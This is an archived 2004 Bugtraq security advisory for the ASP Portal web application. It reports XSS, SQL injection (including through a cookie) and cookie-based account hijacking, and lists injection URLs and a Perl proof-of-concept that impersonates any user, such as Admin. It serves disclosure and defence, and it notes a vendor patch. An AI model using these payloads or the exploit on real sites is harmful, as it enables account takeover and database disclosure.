lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040214051635.16602.qmail@gulo.org>
Date: Sat, 14 Feb 2004 06:16:35 +0100
From: "Manuel López" <mantra@...o.org>
To: bugtraq@...urityfocus.com
Subject: ASP Portal Multiple Vulnerabilities


 -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1 

Title: Asp Portal Multiple Vulnerabilities 

By: Manuel López 

Software: Asp Portal 

Vendor Description:
ASP Portal is a an ASP powered portal site which uses an Access database to 
store all the site info. The script also includes and easy to use Admin 
Interface, so you can change everything you need to online, which makes 
maintaing the site very easy. 

Severity:
Moderately critical 

Impact:
Disclosure of authentication information, Disclosure of user information, 
Execution of arbitrary code via network, Modification of user information, 
ID Spoofing. 

Underlying OS:  Linux (Any), UNIX (Any), Windows (Any) 

Description: 

 ---- Cross-Site Scripting ---- 

This product is vulnerable to the Cross-Site Scripting vulnerability that 
would allow attackers to inject HTML and script codes into the pages and 
execute it on the client's browser. 

http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS] 

 ---- Image ScriptCode Injection ---- 

An attacker can inject arbitrary HTML or scriptcode instead of an Image in 
"photograph URL" of user's 'details' page.
javascript:alert() 

 ---- Sql Injection ---- 

Another problem of sanitation could lead an attacker to inject SQL code to 
manipulate and disclose various information from the database. The problem 
is in the fields 'pageid' and 'downloadscat'. 

http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery] 

Also it is possible an Sql Injection in the cookie, in 'thenick' field. 

GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery] 

 ---- Cookie Account Hijack ---- 

It is possible to impersonate others by manipulating the 'thenick' parameter 
in the cookie.
Modifying the cookie is possible to gain access to other account. This issue 
can be exploited to gain an administrative account with the service. 

 ---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ---- 

#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm 

use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print " ____________________________________________________________ \n";
print "|                                                            |\n";
print "|   PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
print "|   Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "|                                                            |\n";
print "|   By: Manuel López #IST                                    |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
} 

$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3]; 

print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Cookie: thenick=$usuario 

taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result; 

 ------------------------------------------------ 

Solution:
Vendor contacted.
The vulnerabilities have reportedly been fixed in the new version.
Download the January patch: 
http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new 
version. 

 ---- Credits ---- 

Manuel López ( mantra@...o.org ) #IST
Special ThankŽs: -- Aklis -- gulo.org 

Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST 
staff. 

Excuse me for speaking English so badly. 

 -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 

iD8DBQFALavflZD3/ZFHM4ERApRSAJ46rZRn3OlSXp/k2jXwCXT0S0RLywCgn08e
mx+V1tKxAMSzt7PTgVh2D2A=
=0oiR
 -----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ